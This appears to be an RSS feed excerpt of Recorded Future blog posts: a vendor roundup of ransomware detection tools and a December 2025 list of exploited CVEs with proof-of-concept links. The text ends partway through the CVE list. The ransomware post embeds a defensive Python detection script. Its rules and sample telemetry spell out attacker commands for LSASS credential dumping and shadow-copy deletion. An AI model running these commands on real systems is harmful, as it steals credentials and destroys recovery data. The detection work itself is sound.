              <h3>Why is integrating external threat intelligence mandatory for TVM in 2026?</h3>
              <p>External threat intelligence provides real-time context on the threat landscape. These days, it’s mandatory because it allows security teams to identify which vulnerabilities are being actively exploited in the wild, have associated proof-of-concept (PoC) code, or are being discussed on the dark web, enabling true risk-based prioritization.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does Recorded Future Vulnerability Intelligence help with prioritization?</h3>
              <p>Recorded Future Vulnerability Intelligence automatically assigns a dynamic Risk Score to every CVE by correlating it with real-time threat intelligence from across the internet, including evidence of active exploitation, malware associations, and dark web chatter. This lets teams instantly know if a vulnerability is a theoretical risk or an immediate, active threat requiring urgent attention.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is Attack Surface Intelligence, and what role does it play in TVM?</h3>
              <p>Attack Surface Intelligence is the continuous process of identifying and monitoring all external-facing assets of an organization (like public IPs, domains, and cloud services). In TVM, it is crucial to ensure that vulnerabilities are not just identified on known assets, but also on shadow IT and unknown exposed systems that are most likely to be targeted by adversaries.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does the TVM lifecycle differ from the traditional vulnerability management lifecycle?</h3>
              <p>While both involve Discovery, Assessment, and Remediation, the TVM lifecycle adds an explicit Threat Analysis step before prioritization and closes the loop by verifying that remediation actually reduced exposure. The modern TVM cycle is typically:</p>
              <ul>
                <li>Identify Assets</li>
                <li>Scan for Vulnerabilities</li>
                <li>Enrich with Threat Context</li>
                <li>Prioritize by Real Risk</li>
                <li>Remediate</li>
                <li>Verify Remediation</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1db30163db7f6aa5dca641559f3f07e312ffaeda4.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Best Ransomware Detection Tools]]></title>
            <link>https://www.recordedfuture.com/blog/best-ransomware-detection-tools</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/best-ransomware-detection-tools</guid>
            <pubDate>Tue, 13 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Stop ransomware before encryption begins. Learn how intelligence-driven detection tools can help identify precursor behaviors and reduce false positives for faster response.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Effective ransomware detection requires three complementary layers: endpoint and extended detection and response (EDR/XDR) to monitor device-level activity, network detection and response (NDR) to catch lateral movement, and threat intelligence tools to provide context that enables efficient prioritization.</li>
          <li>The most valuable detection happens before ransomware encryption begins. Tools must identify precursor behaviors like reconnaissance, credential theft, and data staging rather than waiting for known indicators of compromise.</li>
          <li>Intelligence quality determines detection quality: even sophisticated security tools require real-time threat data about active ransomware campaigns, attacker infrastructure, and current tactics, techniques, and procedures (TTPs) to distinguish genuine threats from noise.</li>
          <li>Recorded Future strengthens the entire detection stack by providing organization-specific threat intelligence, early detection capabilities (in some cases, identifying victims up to 30 days before public extortion), and vulnerability intelligence focused on what ransomware groups are actively exploiting.</li>
        </ul>
        <h2>Introduction</h2>
        <p>The ransomware playbook has fundamentally changed. Instead of casting wide nets with opportunistic phishing campaigns, attackers now focus on big-game hunting: targeting high-value enterprises with data theft and double or triple extortion tactics. Threat actors purchase pre-compromised access from brokers, exploit newly disclosed vulnerabilities within hours, and use automation to compress weeks-long campaigns into days.</p>
        <p>The results are stark. Ransomware now appears in 44% of breaches, up from 32% the prior year, according to the <a href="https://www.verizon.com/business/resources/Ta64/reports/2025-dbir-data-breach-investigations-report.pdf">2025 Verizon Data Breach Investigations Report</a>. Traditional signature-based detection tools often can't keep pace because ransomware groups continuously rotate their infrastructure, modify malware variants, and adopt new tactics faster than defenses can update. By the time a signature is written, the threat has already evolved.</p>
        <p>This gap has created demand for a different approach: intelligence-driven ransomware detection. Rather than waiting for known indicators of compromise, these tools identify the precursor behaviors that happen before encryption (e.g. reconnaissance, credential theft, lateral movement, privilege escalation, and data staging).</p>
        <p>The key is continuous external intelligence that maps what's happening in your environment to active campaigns and specific ransomware families operating in the wild.</p>
        <p>The most effective defense combines three layers: endpoint and extended detection and response (EDR/XDR) to catch suspicious behaviors on devices, network detection and response (NDR) with deception technology to spot lateral movement, and threat intelligence tools that provide the real-time context tying it all together. When these tools share a common intelligence foundation, they can reveal malicious intent well before encryption begins.</p>
        <h2>The Ransomware Detection Tool Landscape: Three Pillars of Defense</h2>
        <p>Effective ransomware detection generally requires three complementary tool categories, each targeting different stages of an attack.</p>
        <h3>1. Endpoint and Extended Detection and Response (EDR/XDR) Tools</h3>
        <p>EDR and XDR platforms form the first line of defense, monitoring individual devices and user activity for signs of compromise.</p>
        <p><strong>Core Functionality</strong></p>
        <p>EDR and XDR solutions monitor endpoints for suspicious behaviors like privilege escalation, credential dumping, unusual process creation, and bulk file modifications. When they detect threats, these tools automatically isolate devices, roll back changes, and contain threats, cutting response time from hours to seconds.</p>
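        <p>As an added example, not code from the original post or from any of the vendors named here, the script below shows what “detect the precursors, not the encryption” looks like as detection logic: simple rules for domain discovery, LSASS dumping, password-protected archiving, and shadow-copy deletion, plus an SMB fan-out rule for lateral movement, are correlated per host and escalated when several distinct stages appear together. The telemetry, hostnames, and thresholds are constructed for illustration; the rules are simplified and are not any product’s detection content. The technique IDs are real MITRE ATT&amp;CK identifiers.</p>

```python
"""Added example: correlate ransomware precursor behaviours on constructed endpoint telemetry.

Events, hostnames and thresholds are constructed for illustration; the rules are
deliberately simplified and are not any vendor's detection content.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (stage, MITRE technique ID, pattern over the process command line)
PROCESS_RULES = [
    ("discovery", "T1018", re.compile(r"\bnltest(\.exe)?\s+/dclist", re.I)),
    ("credential_access", "T1003.001",
     re.compile(r"comsvcs\.dll.*MiniDump|procdump.*lsass", re.I)),
    ("data_staging", "T1560.001",
     re.compile(r"\b7z(\.exe)?\s+a\b.*\s-p\S+", re.I)),      # password-protected archive
    ("inhibit_recovery", "T1490",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
]
SMB_FANOUT_HOSTS = 5                        # distinct SMB targets per window (assumed threshold)
SMB_FANOUT_WINDOW = timedelta(minutes=2)    # assumed window

# Constructed telemetry: one workstation doing discovery, LSASS dumping and SMB fan-out,
# one file server staging data and deleting shadow copies, plus two benign look-alikes.
EVENTS = [
    {"ts": "2026-01-13T09:00:01", "host": "ws-117", "type": "process",
     "cmd": "nltest /dclist:corp"},
    {"ts": "2026-01-13T09:00:40", "host": "ws-117", "type": "process",
     "cmd": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump 712 C:\\temp\\l.dmp full"},
    {"ts": "2026-01-13T09:02:00", "host": "ws-117", "type": "netconn", "dst": "10.0.0.21", "dport": 445},
    {"ts": "2026-01-13T09:02:05", "host": "ws-117", "type": "netconn", "dst": "10.0.0.22", "dport": 445},
    {"ts": "2026-01-13T09:02:09", "host": "ws-117", "type": "netconn", "dst": "10.0.0.23", "dport": 445},
    {"ts": "2026-01-13T09:02:14", "host": "ws-117", "type": "netconn", "dst": "10.0.0.24", "dport": 445},
    {"ts": "2026-01-13T09:02:20", "host": "ws-117", "type": "netconn", "dst": "10.0.0.25", "dport": 445},
    {"ts": "2026-01-13T09:20:00", "host": "fs-01", "type": "process",
     "cmd": "7z.exe a -pS3cret D:\\staging\\finance.7z D:\\Finance"},
    {"ts": "2026-01-13T09:21:00", "host": "fs-01", "type": "process",
     "cmd": "vssadmin.exe delete shadows /all /quiet"},
    # benign: an administrator listing shadow copies, and a nightly backup archiving a share
    {"ts": "2026-01-13T09:30:00", "host": "admin-01", "type": "process",
     "cmd": "vssadmin.exe list shadows"},
    {"ts": "2026-01-13T23:00:00", "host": "backup-02", "type": "process",
     "cmd": "7z.exe a E:\\backups\\daily.7z D:\\Finance"},
]


def detect(events):
    """Return {host: [(stage, technique, evidence), ...]} for every rule that fired."""
    hits = defaultdict(list)
    smb_by_host = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["type"] == "process":
            for stage, technique, pattern in PROCESS_RULES:
                if pattern.search(e["cmd"]):
                    hits[e["host"]].append((stage, technique, e["cmd"]))
        elif e["type"] == "netconn" and e["dport"] == 445:
            smb_by_host[e["host"]].append((datetime.fromisoformat(e["ts"]), e["dst"]))
    # lateral movement: many distinct SMB targets from one host inside a short window
    for host, conns in smb_by_host.items():
        for i, (t0, _) in enumerate(conns):
            targets = {dst for t, dst in conns[i:] if t - t0 <= SMB_FANOUT_WINDOW}
            if len(targets) >= SMB_FANOUT_HOSTS:
                hits[host].append(("lateral_movement", "T1021.002",
                                   f"SMB to {len(targets)} hosts within {SMB_FANOUT_WINDOW}"))
                break
    return hits


def triage(events):
    """Per-host verdict: the more distinct precursor stages on one host, the higher the severity."""
    verdicts = {}
    for host, host_hits in detect(events).items():
        stages = sorted({stage for stage, _, _ in host_hits})
        severity = "critical" if len(stages) >= 3 else "high" if len(stages) == 2 else "low"
        verdicts[host] = {"severity": severity, "stages": stages,
                          "techniques": sorted({technique for _, technique, _ in host_hits})}
    return verdicts


if __name__ == "__main__":
    for host, verdict in triage(EVENTS).items():
        print(host, verdict)
```

        <p>The workstation escalates to critical on discovery plus credential dumping plus SMB fan-out before any file has been touched; the file server is flagged high on staging plus shadow-copy deletion; the administrator’s <code>vssadmin list shadows</code> and the unencrypted nightly backup archive fire nothing. In a real deployment the intelligence layer described in the next section is what turns the <code>severity</code> field into a decision: the same stages matched against a currently active ransomware playbook warrant containment, whereas a single stage on a host with no campaign match is a ticket for review.</p>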
        <p><strong>How Threat Intelligence Enhances EDR/XDR</strong></p>
        <p>Threat intelligence connects endpoint activity to active campaigns in the wild. When an EDR tool flags suspicious activity, intelligence context reveals whether it matches known campaigns from groups like LockBit, ALPHV/BlackCat, or Black Basta. This can dramatically reduce false positives by distinguishing unusual-but-legitimate administrative work from activity aligned with active ransomware operations.</p>
        <p><strong>Example Tools</strong></p>
        <ul>
          <li><strong>CrowdStrike Falcon</strong> delivers strong behavioral detection capabilities tied to comprehensive actor profiling. The platform's threat graph continuously correlates endpoint telemetry with global threat intelligence, enabling rapid identification of ransomware precursors.</li>
          <li><strong>Microsoft Defender XDR</strong> integrates telemetry across identity systems, endpoints, email, and cloud applications. This unified visibility helps security teams identify cross-domain attack patterns that indicate ransomware preparation, such as credential theft followed by lateral movement.</li>
          <li><strong>SentinelOne</strong> employs behavioral AI to detect malicious activity and offers a rollback feature that restores encrypted or modified files from Windows Volume Shadow Copy snapshots, effectively returning systems to their pre-attack state. Because the feature depends on those snapshots, protecting them matters: deleting shadow copies is itself a standard ransomware precursor.</li>
        </ul>
        <h3>2. Network Detection and Response (NDR) Tools</h3>
        <p>While EDR focuses on individual endpoints, NDR tools monitor the network layer to catch attackers as they move between systems.</p>
        <p><strong>Core Functionality</strong></p>
        <p>NDR platforms watch internal network traffic to catch attackers moving laterally, scanning for targets, or accessing resources they shouldn't. The more advanced versions include deception technology like honeypots, fake credentials, and decoy systems that look like attractive targets. When attackers interact with these decoys during reconnaissance, security teams get early warnings before any real damage occurs.</p>
        <p><strong>How Threat Intelligence Improves NDR and Deception</strong></p>
        <p>Threat intelligence helps organizations customize deception environments based on active ransomware groups in their industry. When NDR tools spot anomalies such as unusual file sharing, unexpected queries, or abnormal transfers, intelligence matches these to current attack techniques, distinguishing administrative work from reconnaissance patterns before data staging begins.</p>
        <p><strong>Example Tools</strong></p>
        <ul>
          <li><strong>Vectra AI</strong> specializes in detecting lateral movement and privilege misuse by correlating network behaviors with active attacker tradecraft. The platform's AI-driven detection identifies subtle deviations from normal network patterns that indicate ransomware reconnaissance.</li>
          <li><strong>ExtraHop Reveal(x)</strong> provides real-time network visibility that identifies reconnaissance activity and command-and-control (C2) communications. Its deep packet inspection covers TLS-encrypted sessions when decryption is configured with forwarded session keys; without that, encrypted flows are analyzed on metadata such as peers, timing, and volume.</li>
          <li><strong>Illusive (now part of Proofpoint)</strong> deploys deception technology specifically tuned to adversary behaviors. The platform's decoys and fake credentials create a minefield for attackers, triggering high-confidence alerts when threat actors interact with deception assets.</li>
        </ul>
        <h3>3. Threat Intelligence Tools</h3>
        <p>The third pillar provides the context that makes endpoint and network detection tools more accurate and actionable.</p>
        <p><strong>Core Functionality</strong></p>
        <p>Threat intelligence tools pull together global threat data from sources like dark web forums, malware repositories, scanning activity, and criminal infrastructure. They enrich alerts from your other security tools with context about who's behind an attack, which campaign it's part of, and what techniques the attackers are likely to use next.</p>
        <p><strong>How Threat Intelligence Strengthens Ransomware Detection</strong></p>
        <p>These tools deliver several critical capabilities that transform how security teams identify and respond to ransomware threats:</p>
        <ul>
          <li><strong>Threat Mapping:</strong> Identifies whether your organization matches the targeting profile of active ransomware groups based on your industry, size, region, and technology stack. Specific operators are mapped using their TTPs to determine the intent and opportunity of carrying out a successful attack against your business.</li>
          <li><strong>Infrastructure Tracking:</strong> Monitors ransomware operators' continuous infrastructure shifts in real-time, identifying new C2 servers, drop sites, and payment infrastructure as they emerge.</li>
          <li><strong>Variant Identification:</strong> Rapidly analyzes and disseminates indicators when ransomware groups release new malware variants, enabling detection before signature-based systems receive updates.</li>
          <li><strong>Exploitation Intelligence:</strong> Identifies specific CVEs and misconfigurations that attackers are actively weaponizing, moving vulnerability management from severity-score-driven to threat-driven prioritization.</li>
          <li><strong>Risk Scoring:</strong> Provides real-time scores combining multiple intelligence signals—indicator prevalence, campaign association, TTP alignment—to guide analysts toward genuine threats rather than generic suspicious activity.</li>
        </ul>
        <p><strong>Example Tools</strong></p>
        <ul>
          <li><strong>Recorded Future</strong> delivers organization-specific threat intelligence powered by The Intelligence Graph and proprietary AI. The platform provides end-to-end visibility into exposures, while research from its Insikt Group enables early detection of ransomware activity, identifying potential victims up to 30 days before public extortion.</li>
          <li><strong>Flashpoint</strong> specializes in deep and dark web intelligence, monitoring criminal forums, marketplaces, and chat channels where ransomware operators communicate, recruit, and trade access. This visibility into adversary communities provides early warnings about emerging threats and campaigns.</li>
          <li><strong>Google Threat Intelligence (which incorporates Mandiant and VirusTotal)</strong> combines frontline incident response insights with global threat tracking. The platform leverages intelligence from breach investigations to identify ransomware group behaviors and attack patterns as they emerge.</li>
        </ul>
        <h2>Choosing the Right Ransomware Detection Tools</h2>
        <p>Security leaders must distinguish between tools that reduce ransomware risk and those that add noise. The most effective tools share several characteristics.</p>
        <p><strong>Security leaders should prioritize:</strong></p>
        <ul>
          <li><strong>Pre-encryption visibility:</strong> Detect credential misuse, suspicious access, and lateral movement during reconnaissance and preparation phases when interventions are most effective.</li>
          <li><strong>Context-rich alerts:</strong> Alerts should include TTPs, infrastructure associations, and known actor activity and explain not just what triggered an alert but why it matters.</li>
          <li><strong>Integration maturity:</strong> Smooth data flow into SIEM, SOAR, and existing investigation workflows without creating siloed intelligence or blind spots.</li>
          <li><strong>Operational efficiency:</strong> Tools should reduce alert noise, not add to it, decreasing time-to-detection and time-to-response.</li>
          <li><strong>Relevance:</strong> Intelligence must map to current campaigns. Generic or stale indicators waste analyst time and create false confidence.</li>
          <li><strong>Scalability:</strong> Handle hybrid environments spanning on-premises infrastructure, multiple cloud providers, and remote endpoints without performance degradation.</li>
        </ul>
        <h2>How Recorded Future Enables Early Ransomware Detection</h2>
        <p>The quality of threat intelligence directly determines detection effectiveness. Even sophisticated endpoint and network tools require high-fidelity, current threat data to generate value. Security teams have plenty of options for tools; the real challenge is addressing <a href="https://www.recordedfuture.com/blog/reduce-alert-fatigue">alert fatigue</a>, which drains analyst time on false positives instead of credible threats.</p>
        <p>Recorded Future functions as the continuous intelligence layer strengthening the entire detection stack. Rather than adding another alert-generating tool, it feeds existing security ecosystems with real-time context about ransomware operator behavior.</p>
        <h3>Real-Time Relevance Through <a href="https://www.recordedfuture.com/products/secops-intelligence">SecOps Intelligence</a></h3>
        <p>Every alert that hits your SIEM or endpoint platform gets automatically enriched with real-time risk scores, associated malware and infrastructure, and links to known attacker techniques and campaigns. Security tools can immediately recognize whether an indicator matches an active ransomware operation, cutting triage time from hours to minutes.</p>
        <h3>Proactive Mitigation Through Vulnerability Intelligence</h3>
        <p>Recorded Future identifies which vulnerabilities ransomware groups are actually exploiting right now, not just which ones have the highest theoretical severity ratings. This distinction matters because most high-severity vulnerabilities never get exploited in the wild, while some medium-severity vulnerabilities become critical the moment ransomware operators weaponize them.</p>
        <p>The platform shows you which vulnerabilities specific ransomware groups are targeting, where exploit code is available, and which vulnerabilities are generating buzz in criminal forums. This lets security teams prioritize patching based on what attackers are actually doing, focusing on the access vectors most likely to result in ransomware incidents.</p>
        <h3>Victimology and Anticipation</h3>
        <p>Intelligence about dark web chatter, leak site activity, and victimology patterns reveals which industries, geographies, and technologies are being targeted. When Recorded Future detects increased targeting of specific sectors, SOC analysts can anticipate attack paths, tighten access controls, and implement protective measures before campaigns reach their network.</p>
        <p>This closes the gap between reconnaissance and encryption. Most traditional tools don't trigger alerts until ransomware starts encrypting systems, by which point attackers have already stolen data. Intelligence-driven detection can catch the reconnaissance, credential theft, and lateral movement phases that happen first, shifting your response window from reactive damage control to proactive early containment.</p>
        <h2>Shifting From Reactive Response to Intelligence-Led Prevention</h2>
        <p>No single tool stops ransomware. The strongest defense is an integrated ecosystem where endpoint detection, network monitoring, and threat analysis platforms work from the same intelligence foundation.</p>
        <p>Intelligence elevates these tools from reactive detection to early recognition of adversary behavior during preparation and reconnaissance phases, enabling intervention before ransomware reaches its destructive phase. Organizations that build detection architecture on real-time threat intelligence will adapt as quickly as their adversaries, maintaining effective defenses as the threat landscape evolves.</p>
        <div>
          <div>
            <div>
              <h2>Frequently Asked Questions</h2>
            </div>
          </div>
          <div>
            <div>
              <h3>Can behavioral analytics alone stop zero-day ransomware variants?</h3>
              <p>While powerful, behavioral analytics alone cannot guarantee a stop to a true zero-day ransomware variant. It excels at detecting malicious behavior (like mass file encryption or privilege escalation), even from unknown malware. The most effective defense is a combination of behavioral analytics, up-to-the-minute threat intelligence on emerging TTPs, and controlled execution (sandboxing).</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the most common weakness of signature-based ransomware detection methods today?</h3>
              <p>The primary weakness is their reactive nature. Signature-based tools only detect known threats—they require a threat to be analyzed and its signature created before they can flag it. They are easily bypassed by polymorphic ransomware or customized, novel variants that threat actors create to evade detection.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How can Recorded Future's SecOps Intelligence Module help my existing EDR/XDR tool detect ransomware faster?</h3>
              <p>Recorded Future's SecOps Intelligence Module ingests and correlates massive amounts of external threat data. It directly integrates with your existing EDR/XDR tools, enriching alerts with real-time context (Risk Scores, actor TTPs, associated malware). This helps your existing tools move beyond basic indicators, prioritize critical alerts, and automatically initiate responses before a potential ransomware event escalates.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does Recorded Future provide victimology data to anticipate ransomware attacks targeting my industry?</h3>
              <p>Recorded Future's <a href="https://www.recordedfuture.com/products/threat-intelligence">Threat Intelligence Module</a> provides crucial victimology and actor insights. It monitors real-time chatter on the dark web and forums to identify specific ransomware groups, their infrastructure, and the industries or regions they are planning to target next. This allows you to prioritize defenses based on pre-attack relevance.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>Is a dedicated deception technology platform considered a primary ransomware detection tool?</h3>
              <p>Deception technology is not a primary prevention tool, but it is an extremely effective early detection tool. It places fake assets (honeypots, fake credentials) within the network. When an attacker, particularly ransomware moving laterally, interacts with a decoy, it immediately triggers a high-fidelity alert, providing security teams with crucial seconds to isolate the endpoint and stop the attack before encryption begins.</p>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_195c3ebf5f4567c5e03d5fb20c8916aafc7cfb0e3.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity]]></title>
            <link>https://www.recordedfuture.com/blog/december-2025-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/december-2025-cve-landscape</guid>
            <pubDate>Tue, 13 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[December 2025 saw a 120% surge in critical CVEs, with 22 exploited flaws and React2Shell (CVE-2025-55182) dominating threat activity across Meta’s React framework.]]></description>
            <content:encoded><![CDATA[
        <p>December 2025 witnessed a dramatic 120% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying <strong>22 vulnerabilities</strong> requiring immediate remediation, up from 10 in November. The month was dominated by widespread exploitation of Meta's React Server Components flaw.</p>
        <p><strong>What security teams need to know:</strong></p>
        <ul>
          <li><strong>React2Shell pandemonium:</strong> CVE-2025-55182 triggered a global exploitation wave with multiple threat actors deploying diverse malware families</li>
          <li><strong>China-nexus exploitation intensifies:</strong> Earth Lamia, Jackpot Panda, and UAT-9686 leveraged critical flaws for espionage operations</li>
          <li><strong>Public exploits proliferate:</strong> Eleven of 22 vulnerabilities have proof-of-concept code available, accelerating exploitation timelines</li>
          <li><strong>Legacy vulnerabilities resurface:</strong> CISA added 2018-2022 era flaws to its Known Exploited Vulnerabilities (KEV) catalog, highlighting persistent patch gaps</li>
        </ul>
        <p><strong>Bottom line:</strong> December's surge reflects both new zero-days and renewed interest in legacy vulnerabilities. React2Shell alone demonstrates how quickly modern web frameworks can become global attack vectors.</p>
        <h2>Quick Reference Table</h2>
        <p><em>All 22 vulnerabilities below were actively exploited in December 2025.</em></p>
        <table>
          <thead>
            <tr>
              <th>#</th>
              <th>Vulnerability</th>
              <th>Risk Score</th>
              <th>Affected Vendor/Product</th>
              <th>Vulnerability Type/Component</th>
              <th>Public PoC</th>
            </tr>
          </thead>
          <tbody>
            <tr><td>1</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBMtKwC/overview">CVE-2025-55182</a></td><td>99</td><td>Meta React Server Components</td><td>CWE-502 (Deserialization of Untrusted Data)</td><td><a href="https://github.com/search?q=CVE-2025-55182&amp;type=repositories">Yes</a></td></tr>
            <tr><td>2</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBRk_r0/overview">CVE-2025-66644</a></td><td>99</td><td>Array Networks ArrayOS AG</td><td>CWE-78 (OS Command Injection)</td><td>No</td></tr>
            <tr><td>3</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/6U4U81/overview">CVE-2025-48572</a></td><td>99</td><td>Google Android</td><td>CWE-306 (Missing Authentication for Critical Function)</td><td>No</td></tr>
            <tr><td>4</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/6U4lfv/overview">CVE-2025-48633</a></td><td>99</td><td>Google Android</td><td>Insufficient Information</td><td>No</td></tr>
            <tr><td>5</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBaz1-z/overview">CVE-2025-59718</a></td><td>99</td><td>Fortinet Multiple Products</td><td>CWE-347 (Improper Verification of Cryptographic Signature)</td><td><a href="https://github.com/search?q=CVE-2025-59718&amp;type=repositories">Yes</a></td></tr>
            <tr><td>6</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBa2HBm/overview">CVE-2025-59719</a></td><td>99</td><td>Fortinet FortiWeb</td><td>CWE-347 (Improper Verification of Cryptographic Signature)</td><td><a href="https://github.com/moften/CVE-2025-59718-Fortinet-Poc">Yes</a></td></tr>
            <tr><td>7</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBaZM-R/overview">CVE-2025-62221</a></td><td>99</td><td>Microsoft Windows</td><td>CWE-416 (Use After Free)</td><td>No</td></tr>
            <tr><td>8</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBMhTQJ/overview">CVE-2025-8110</a></td><td>99</td><td>Gogs</td><td>CWE-22 (Path Traversal)</td><td><a href="https://github.com/search?q=CVE-2025-8110&amp;type=repositories">Yes</a></td></tr>
            <tr><td>9</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBgciBg/overview">CVE-2025-14174</a></td><td>99</td><td>Google Chromium</td><td>CWE-787 (Out-of-bounds Write)</td><td><a href="https://github.com/zeroxjf/CVE-2025-14174-analysis">Yes</a></td></tr>
            <tr><td>10</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBhnuhP/overview">CVE-2025-14611</a></td><td>99</td><td>Gladinet CentreStack and Triofox</td><td>CWE-798 (Use of Hard-coded Credentials)</td><td><a href="https://github.com/pl4tyz/CVE-2025-14611-CentreStack-and-Triofox-full-Poc-Exploit">Yes</a></td></tr>
            <tr><td>11</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBsdjtE/overview">CVE-2025-59374</a></td><td>99</td><td>ASUS Live Update</td><td>CWE-506 (Embedded Malicious Code)</td><td>No</td></tr>
            <tr><td>12</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBtm5Fw/overview">CVE-2025-20393</a></td><td>99</td><td>Cisco Multiple Products</td><td>CWE-20 (Improper Input Validation)</td><td><a href="https://github.com/search?q=CVE-2025-20393&amp;type=repositories">Yes</a></td></tr>
            <tr><td>13</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/5R0AQ0/overview">CVE-2025-43529</a></td><td>99</td><td>Apple Multiple Products</td><td>CWE-416 (Use After Free)</td><td>No</td></tr>
            <tr><td>14</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/5RY_KG/overview">CVE-2025-40602</a></td><td>99</td><td>SonicWall SMA1000 appliance</td><td>CWE-250 (Execution with Unnecessary Privileges)</td><td>No</td></tr>
            <tr><td>15</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBw5PCQ/overview">CVE-2025-14733</a></td><td>99</td><td>WatchGuard Firebox</td><td>CWE-787 (Out-of-bounds Write)</td><td>No</td></tr>
            <tr><td>16</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BBx5LcP/overview">CVE-2025-14847</a></td><td>99</td><td>MongoDB and MongoDB Server</td><td>CWE-130 (Improper Handling of Length Parameter Inconsistency)</td><td><a href="https://github.com/search?q=CVE-2025-14847&amp;type=repositories">Yes</a></td></tr>
            <tr><td>17</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/t9VBl0/overview">CVE-2023-52163</a></td><td>99</td><td>Digiever DS-2105 Pro</td><td>CWE-862 (Missing Authorization)</td><td>No</td></tr>
            <tr><td>18</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/Z2-Qcf/overview">CVE-2018-4063</a></td><td>99</td><td>Sierra Wireless AirLink ALEOS</td><td>CWE-434 (Unrestricted Upload of File with Dangerous Type)</td><td>No</td></tr>
            <tr><td>19</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/BA5mEyi/overview">CVE-2025-58360</a></td><td>99</td><td>OSGeo GeoServer</td><td>CWE-611 (Improper Restriction of XML External Entity Reference)</td><td><a href="https://github.com/search?q=CVE-2025-58360&amp;type=repositories">Yes</a></td></tr>
            <tr><td>20</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/7KUyzy/overview">CVE-2025-6218</a></td><td>99</td><td>RARLAB WinRAR</td><td>CWE-22 (Path Traversal)</td><td><a href="https://github.com/search?q=CVE-2025-6218&amp;type=repositories">Yes</a></td></tr>
            <tr><td>21</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/neGcOR/overview">CVE-2022-37055</a></td><td>99</td><td>D-Link Routers</td><td>CWE-120 (Classic Buffer Overflow)</td><td>No</td></tr>
            <tr><td>22</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/hzmZuu/overview">CVE-2021-26828</a></td><td>99</td><td>OpenPLC ScadaBR</td><td>CWE-434 (Unrestricted Upload of File with Dangerous Type)</td><td><a href="https://github.com/search?q=CVE-2021-26828&amp;type=repositories">Yes</a></td></tr>
          </tbody>
        </table>
        <p><em><strong>Table 1:</strong></em> <em>List of vulnerabilities that were actively exploited in December based on Recorded Future data (Source: Recorded Future)</em></p>
        <h2>Key Trends in December 2025</h2>
        <h3>Affected Vendors</h3>
        <ul>
          <li><strong>Fortinet</strong> remained a concern, with two critical authentication bypass flaws</li>
          <li><strong>Google</strong> faced three vulnerabilities across Android (2) and Chromium (1) platforms</li>
          <li><strong>Microsoft</strong> dealt with a Windows kernel use-after-free vulnerability</li>
          <li><strong>Meta</strong> experienced the month's most impactful vulnerability with React2Shell</li>
          <li>Additional affected vendors: Array Networks, Gogs, Gladinet, ASUS, Cisco, Apple, SonicWall, WatchGuard, MongoDB, Digiever, Sierra Wireless, OSGeo, RARLAB, D-Link, and OpenPLC</li>
        </ul>
        <h3>Most Common Weakness Types</h3>
        <ul>
          <li><strong>CWE-22</strong> – Path Traversal</li>
          <li><strong>CWE-347</strong> – Improper Verification of Cryptographic Signature</li>
          <li><strong>CWE-416</strong> – Use After Free</li>
          <li><strong>CWE-434</strong> – Unrestricted Upload of File with Dangerous Type</li>
          <li><strong>CWE-787</strong> – Out-of-bounds Write</li>
        </ul>
        <h3>Threat Actor Activity</h3>
        <p><strong><a href="https://www.recordedfuture.com/blog/critical-react2shell-vulnerability">React2Shell exploitation</a></strong> <strong>dominated December’s CVE activity:</strong></p>
        <ul>
          <li><strong>Threat actors observed to have exploited this vulnerability:</strong>
            <ul>
              <li><strong>China-nexus actors</strong> Earth Lamia and Jackpot Panda</li>
              <li><strong>China-linked clusters</strong> UNC6600, UNC6586, UNC6588, UNC6603, and UNC6595</li>
              <li>North Korea-linked and financially motivated groups</li>
            </ul>
          </li>
